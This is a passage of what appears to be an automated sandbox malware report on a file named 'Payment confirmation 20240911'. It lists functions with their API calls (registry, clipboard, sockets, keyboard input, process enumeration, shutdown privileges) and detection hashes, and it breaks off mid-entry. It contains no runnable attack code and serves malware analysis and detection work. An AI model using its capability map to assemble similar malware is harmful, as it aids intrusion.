                                          • Instruction Fuzzy Hash: 6462B271E2021A9BDF25CF98C8847AEBBF5BF58314F54816AE909EB285D770D940CF90
                                          Function 013430AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0134317F
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0134321E
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 013432B6
                                          • RegCloseKey.ADVAPI32(000000FE), ref: 013434F5
                                          • RegCloseKey.ADVAPI32(00000000), ref: 01343502
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: b80844ea0bcd8fefc8c780975d8aafcaf674908ab5baa16a393118a23db666b8
                                          • Instruction ID: 3bf1aa9c7314dbeb04fbb2c20ca0af36f9f79401eea875e18acf2f50241f9e38
                                          • Opcode Fuzzy Hash: b80844ea0bcd8fefc8c780975d8aafcaf674908ab5baa16a393118a23db666b8
                                          • Instruction Fuzzy Hash: 1FE16D35204211AFCB15EF68C894D6ABBF8FF89318F04856DF58ADB261DB30E901CB51
                                          Function 01337294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 086c45ff46f26927a85e30e0f820b075dfb2cf0b1863ec9eb984ba8a759a4f69
                                          • Instruction ID: 3d155d3d3837c75c07d065f14655bb921d15fe44da093f2e6f0801fe3a918cbb
                                          • Opcode Fuzzy Hash: 086c45ff46f26927a85e30e0f820b075dfb2cf0b1863ec9eb984ba8a759a4f69
                                          • Instruction Fuzzy Hash: 3121B231300215AFDB21AFA8D849B6D7BACEF44734F04C019F98ADB2A1DB75ED018B94
                                          Function 0133C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0131A857: CLSIDFromProgID.OLE32 ref: 0131A874
                                            • Part of subcall function 0131A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 0131A88F
                                            • Part of subcall function 0131A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0131A89D
                                            • Part of subcall function 0131A857: CoTaskMemFree.OLE32(00000000), ref: 0131A8AD
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0133C6AD
                                          • _memset.LIBCMT ref: 0133C6BA
                                          • _memset.LIBCMT ref: 0133C7D8
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0133C804
                                          • CoTaskMemFree.OLE32(?), ref: 0133C80F
                                          Strings
                                          • NULL Pointer assignment, xrefs: 0133C85D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: e8d922d11722067e5a659205f30dc6b64da9cf9fc2d6684eef622987cfc2c8f2
                                          • Instruction ID: 6c3cd1975743a3188429853a023b0bc860fde9b3a67a72024631423ab223a9e8
                                          • Opcode Fuzzy Hash: e8d922d11722067e5a659205f30dc6b64da9cf9fc2d6684eef622987cfc2c8f2
                                          • Instruction Fuzzy Hash: 3E913A71D00219AFDB11DFA4DC84EEEBBB9AF59714F10812AE919A7280DB705A45CFA0
                                          Function 013324A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 013324F6
                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01332526
                                          • _wcscmp.LIBCMT ref: 0133253A
                                          • _wcscmp.LIBCMT ref: 01332555
                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 013325F3
                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01332609
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: 50ce028d9ecf0b791fdf48aeaeac73aa4e841564020c6d869600bbe1a156b60e
                                          • Instruction ID: fcbf4e204e71d8453cadac22045bd451d732a9c01c1821491069e3dd0c16d7c3
                                          • Opcode Fuzzy Hash: 50ce028d9ecf0b791fdf48aeaeac73aa4e841564020c6d869600bbe1a156b60e
                                          • Instruction Fuzzy Hash: 2E418E7190420AEFEF15DFA8CC58AEFBBB8FF58318F104456E915A2290E7749A44CF94
                                          Function 012E8CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-1546025612
                                          • Opcode ID: 42e6dd80428e1edc68398ade6f49d9c5d1877c317d1eb567864a4f2ae5c2e01c
                                          • Instruction ID: 69c8f2b639a9e7c0b6163a3d062303e6d72b0dc63ebd18419709b8de7aaf6dee
                                          • Opcode Fuzzy Hash: 42e6dd80428e1edc68398ade6f49d9c5d1877c317d1eb567864a4f2ae5c2e01c
                                          • Instruction Fuzzy Hash: F492BD70E1021ACBDF25CF5CC8487BDBBF5BB44318F9481AAE995AB285D77099C1CB90
                                          Function 012E8530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: dad5d0d6b533098b0acbfaeb75557fbfe475fc1fcc025e3d7b186eea42d5fc7d
                                          • Instruction ID: a6572c15e7b78e904378192458004a5f427d7ad3d028577b9c07e7852a7f44ef
                                          • Opcode Fuzzy Hash: dad5d0d6b533098b0acbfaeb75557fbfe475fc1fcc025e3d7b186eea42d5fc7d
                                          • Instruction Fuzzy Hash: 2E12CE70A1060ADFDF18DFA9C985ABEB7F5FF48304F504569E846E7250EB36A920CB50
                                          Function 013282D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0131BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0131BF0F
                                            • Part of subcall function 0131BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0131BF3C
                                            • Part of subcall function 0131BEC3: GetLastError.KERNEL32 ref: 0131BF49
                                          • ExitWindowsEx.USER32(?,00000000), ref: 0132830C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: c8e56fb30b331c676b7f4a4717e368a43f6e6bb57cb82166532c49bedf8f5460
                                          • Instruction ID: b963679ac663c365f6e9e2e9375dd5b9372b5bb76a7dc5d1dfcd8f7cea072698
                                          • Opcode Fuzzy Hash: c8e56fb30b331c676b7f4a4717e368a43f6e6bb57cb82166532c49bedf8f5460
                                          • Instruction Fuzzy Hash: 8301A776744335ABF768367C8C4ABBB7A9C9B0479CF0444A4EB53D51E5D6609C0181A4
                                          Function 013391DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01339235
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339244
                                          • bind.WSOCK32(00000000,?,00000010), ref: 01339260
                                          • listen.WSOCK32(00000000,00000005), ref: 0133926F
                                          • WSAGetLastError.WSOCK32(00000000), ref: 01339289
                                          • closesocket.WSOCK32(00000000,00000000), ref: 0133929D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: f86d9555981e0d037086705aee6c582b0f066116047498ed627788d3ebb902f0
                                          • Instruction ID: 9c657bd415df34f38f1980ae31213a36ff4950782bd47fce6631a90373618d19
                                          • Opcode Fuzzy Hash: f86d9555981e0d037086705aee6c582b0f066116047498ed627788d3ebb902f0
                                          • Instruction Fuzzy Hash: 5B219135600619DFCB10EFA8C884B6EB7EDEF88328F108159E956E7390CB74AD41CB51
                                          Function 01326F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01326F7D
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 01326F8D
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 01326FAC
                                          • __wsplitpath.LIBCMT ref: 01326FD0
                                          • _wcscat.LIBCMT ref: 01326FE3
                                          • CloseHandle.KERNEL32(00000000), ref: 01327022
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                          • String ID:
                                          • API String ID: 1605983538-0
                                          • Opcode ID: 19d6a28da1f43d167e277030134895a6e58c632a8851eda344c368f26a6c74bb
                                          • Instruction ID: cd75efcb585982c97bf3a7815eb411f9ee4d944ef2de69dcf0c035f320d8fa49
                                          • Opcode Fuzzy Hash: 19d6a28da1f43d167e277030134895a6e58c632a8851eda344c368f26a6c74bb
                                          • Instruction Fuzzy Hash: C6219571900219ABDB21ABA4CC88BEEB7FCAB18704F1044A5E545D3141E7759B84CB60
                                          Function 012EA0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • _memmove.LIBCMT ref: 01353020
                                          • _memmove.LIBCMT ref: 01353135
                                          • _memmove.LIBCMT ref: 013531DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 7596acf1cc0005e54231c18a30c945f39a9b25c55658b1001a3894c521d2711b
                                          • Instruction ID: 9b680fae813ab9e2ef209380f310d9dacc6486f7009e808ca20379581a607aee
                                          • Opcode Fuzzy Hash: 7596acf1cc0005e54231c18a30c945f39a9b25c55658b1001a3894c521d2711b
                                          • Instruction Fuzzy Hash: C202AF70A1020ADBDF09DF68C985ABEBBF5FF44340F548069E806EB255EB31DA15CB91
                                          Function 013396E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0133ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0133ACF5
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0133973D
                                          • WSAGetLastError.WSOCK32(00000000,00000000), ref: 01339760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorLastinet_addrsocket
                                          • String ID:
                                          • API String ID: 4170576061-0
                                          • Opcode ID: 1cc88d791491d550d21e6f24f1b72d79c5b48dcb15d1ddcbc5b58d67a3041d7e
                                          • Instruction ID: fa62d1f80cfde7b995923fdef199ff45fa7e11d3cc4dcb9fc729ea8de41c40ed
                                          • Opcode Fuzzy Hash: 1cc88d791491d550d21e6f24f1b72d79c5b48dcb15d1ddcbc5b58d67a3041d7e
                                          • Instruction Fuzzy Hash: 9D41D070610205AFDB24AF68C884E7EB7EDEF84728F44805CFA56AB3D1DB749D018B91
                                          Function 0132F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0132F37A
                                          • _wcscmp.LIBCMT ref: 0132F3AA
                                          • _wcscmp.LIBCMT ref: 0132F3BF
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0132F3D0
                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0132F3FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                          • String ID:
                                          • API String ID: 2387731787-0
                                          • Opcode ID: 2798fbe62060f30f1fa57db826797cdd5d204304a0777cf8493e64009ca42f3a
                                          • Instruction ID: 23df9463f37562e347d960f8380d021bd971ae95e7db7394b385f250878861bb
                                          • Opcode Fuzzy Hash: 2798fbe62060f30f1fa57db826797cdd5d204304a0777cf8493e64009ca42f3a
                                          • Instruction Fuzzy Hash: 4741AC356003029FC718EF68C490AA9B7F8FF49328F10416DEA5ACB3A1DB71E945CB91
                                          Function 013420F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 01342104
                                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 01342116
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetProcessId$kernel32.dll
                                          • API String ID: 2574300362-399901964
                                          • Opcode ID: 6b6d31497453fb42a1d060092402f5413f5c77b859f909f60c48f5dd327c303d
                                          • Instruction ID: 3f29ca0ba1b42d747ce5bc4ccdaad2fd6a51bd4d05c41e524d182fcce7031cf4
                                          • Opcode Fuzzy Hash: 6b6d31497453fb42a1d060092402f5413f5c77b859f909f60c48f5dd327c303d
                                          • Instruction Fuzzy Hash: ECD05E38500712DBDB306BA6A4096133AD8AB08208F00841DE69BA1219D6F0D4808B10
                                          Function 012F2B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • _memmove.LIBCMT ref: 012F2C63
                                          • _memmove.LIBCMT ref: 012F303A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID: @
                                          • API String ID: 1300846289-2766056989
                                          • Opcode ID: a3b3f5350059cc9275a52c7d50ed2ef4639838e351a45d0944669fb49fba2753
                                          • Instruction ID: 90640af29a2f3326026712b9f9d9bffb2ead4284b6f25f6ab31e22de9329744d
                                          • Opcode Fuzzy Hash: a3b3f5350059cc9275a52c7d50ed2ef4639838e351a45d0944669fb49fba2753
                                          • Instruction Fuzzy Hash: 47C29C74A2020ADFDB14DF98C484AAEFBB5FF49304F54806DEA06AB391D774E945CB90
                                          Function 01324342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 0132439C
                                          • SetKeyboardState.USER32(00000080), ref: 013243B8
                                          • PostMessageW.USER32 ref: 01324425
                                          • SendInput.USER32(00000001,?,0000001C), ref: 01324483
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: c6432d1f86b76292b50effbf9addcda38805b51248e83a6b442489eb5d3f3c6b
                                          • Instruction ID: c7e7ee3ddd375b3c782a8cb804c9b02b953e4f0f8d47c0621f9a3562e124253a
                                          • Opcode Fuzzy Hash: c6432d1f86b76292b50effbf9addcda38805b51248e83a6b442489eb5d3f3c6b
                                          • Instruction Fuzzy Hash: 5C412A70A00268AAFF31AB69D8087FD7FB9AF49319F04011AE6C5A76C1C7788985C765
                                          Function 0132713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0132715C
                                          • _memset.LIBCMT ref: 0132717D
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 013271CF
                                          • CloseHandle.KERNEL32(00000000), ref: 013271D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: f37038762435296dde5367be85f645665007104c68181ba6ee583e46506bf828
                                          • Instruction ID: 51094d6d2e8c94cc980ca838ed65b42583ca1b390ec19ee173db89bcae72fed9
